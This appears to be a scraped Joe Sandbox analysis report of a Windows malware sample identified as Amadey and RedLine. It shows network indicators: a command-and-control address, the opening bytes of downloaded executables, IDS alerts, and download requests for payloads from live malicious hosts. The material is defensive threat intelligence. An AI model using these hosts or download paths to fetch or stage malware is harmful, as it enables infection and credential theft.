Source: Malware configuration extractor	URLs: 103.84.89.222:33791

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 18 Feb 2025 06:40:11 GMTContent-Type: application/octet-streamContent-Length: 1805824Last-Modified: Sun, 16 Feb 2025 22:05:42 GMTConnection: keep-aliveETag: "67b26136-1b8e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 a2 a9 0c f0 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 74 01 00 00 08 00 00 00 00 00 00 00 40 47 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 47 00 00 04 00 00 53 b9 1b 00 03 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 c0 01 00 69 00 00 00 00 a0 01 00 4c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 c1 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 01 00 00 20 00 00 00 a4 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 4c 05 00 00 00 a0 01 00 00 04 00 00 00 c4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 c0 01 00 00 02 00 00 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 2a 00 00 e0 01 00 00 02 00 00 00 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 66 72 71 63 6f 66 67 00 a0 1a 00 00 80 2c 00 00 9c 1a 00 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 71 72 66 79 62 62 63 00 20 00 00 00 20 47 00 00 04 00 00 00 68 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 47 00 00 22 00 00 00 6c 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 18 Feb 2025 06:40:16 GMTContent-Type: application/octet-streamContent-Length: 1786880Last-Modified: Tue, 18 Feb 2025 05:18:37 GMTConnection: keep-aliveETag: "67b4182d-1b4400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 03 11 b2 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 c0 68 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 68 00 00 04 00 00 ed 3d 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 2a 00 00 c0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 6b 6f 6d 6f 78 68 73 00 a0 19 00 00 10 4f 00 00 a0 19 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 66 71 6d 76 74 6b 6c 00 10 00 00 00 b0 68 00 00 04 00 00 00 1e 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 68 00 00 22 00 00 00 22 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 172.67.75.172 172.67.75.172

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49890 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49927 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49868 -> 104.21.21.16:443

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75

Source: global traffic	HTTP traffic detected: GET /dl/20891284/xclient.exe HTTP/1.1Host: tmpfiles.org
Source: global traffic	HTTP traffic detected: GET /geoip HTTP/1.1Host: api.ip.sbConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/SQL_gulong1/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /files/smirnov2626/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: ecozessentials.comConnection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: tmpfiles.org
Source: global traffic	DNS traffic detected: DNS query: ecozessentials.com
Source: global traffic	DNS traffic detected: DNS query: api.ip.sb

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report TxTPu961er.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
TxTPu961er.exe